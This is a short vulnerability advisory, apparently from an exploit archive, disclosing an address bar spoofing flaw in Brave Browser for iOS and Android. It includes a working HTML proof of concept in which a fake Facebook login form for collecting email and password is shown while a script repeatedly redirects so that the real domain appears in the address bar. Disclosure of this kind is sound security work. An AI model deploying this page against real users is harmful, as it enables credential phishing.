Brave Browser suffers from an address bar spoofing vulnerability. iOS version 1.2.16 (16.09.30.10) and Android version 1.9.56 is affected.
c069cc5fd270e74c97b4fecf56ed55ff2a5716dfe46f318f46caefbe5ba9815f
Summary:
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
spoofing is a critical vulnerability in which any attacker can spoof the
address bar to a legit looking website but the content of the web-page
remains different from the Address-Bar display of the site. In Simple
words, the victim sees a familiar looking URL but the content is not from
the same URL but the attacker controlled content. Some companies say "We
recognize that the address bar is the only reliable security indicator in
modern browsers" .
Products affected:
- In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
- In Android - Affected in Brave Latest version 1.9.56
*Exploit Code: *
<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>
*Credits:*
Aaditya Purani
*Contact : *
https://aadityapurani.com
https://twitter.com/aaditya_purani
*Proof Of Concept:*
https://hackerone.com/reports/175958
With Kind Regards
Aaditya Purani
My Exploit DB profile: https://www.*exploit*-*db*.com/author/?a=8636
My PacketStorrnSecurity profile:
https://packetstormsecurity.com/files/author/11994/